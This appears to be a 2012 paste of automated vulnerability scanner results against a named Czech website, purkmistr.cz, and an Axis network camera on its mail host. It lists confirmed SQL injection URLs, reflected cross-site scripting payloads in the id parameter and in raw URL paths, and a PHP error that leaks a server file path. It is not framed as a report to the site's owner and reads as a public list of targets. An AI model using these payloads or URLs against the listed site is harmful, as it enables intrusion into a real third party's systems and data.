sroub3k

purkmistr.cz

May 8th, 2012
http://www.purkmistr.cz/ - SQLi, XSS

||| [High Possibility] SQL Injection
Severity: Critical
Confirmation: Confirmed
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98

Vulnerable URL: http://www.purkmistr.cz/plan-akci-purkmistr-plzen.php?id=%27
Vulnerable URL: http://www.purkmistr.cz/de_plan-akci-purkmistr-plzen.php?id=%27
Vulnerable URL: http://www.purkmistr.cz/en_plan-akci-purkmistr-plzen.php?id=%27

|-| XSS (Cross-site Scripting)

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://www.purkmistr.cz/plan-akci-purkmistr-plzen.php?id=336'"--></style></script><script>alert(0x000134)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: 336'"--></style></script><script>alert(0x000134)</script>

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://www.purkmistr.cz/de_plan-akci-purkmistr-plzen.php?id=323'"--></style></script><script>alert(0x0007DB)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: 323'"--></style></script><script>alert(0x0007DB)</script>

||| Programming Error Message

Severity: Low
Confirmation: Confirmed
Vulnerable URL: http://www.purkmistr.cz/de_plan-akci-purkmistr-plzen.php?id=%27
Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
Identified Error Message: <b>Fatal error</b>: Call to a member function fetch_array() on a non-object in <b>/stor1/purkmistr/html/plan_akci.php</b> on line <b>164</b>
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: %27

||| Axis 2100 Network Camera - http://mail.purkmistr.cz:88/view/index.shtml

-|- XSS (Cross-site Scripting) -|-

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://mail.purkmistr.cz:88/view/'"--></style></script><script>alert(0x000024)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: '"--></style></script><script>alert(0x000024)</script>

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://mail.purkmistr.cz:88/view/index.shtml'"--></style></script><script>alert(0x000039)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: '"--></style></script><script>alert(0x000039)</script>

Severity: Important
Confirmation: Confirmed
Vulnerable URL: http://mail.purkmistr.cz:88/view/view.shtml'"--></style></script><script>alert(0x00003B)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: '"--></style></script><script>alert(0x00003B)</script>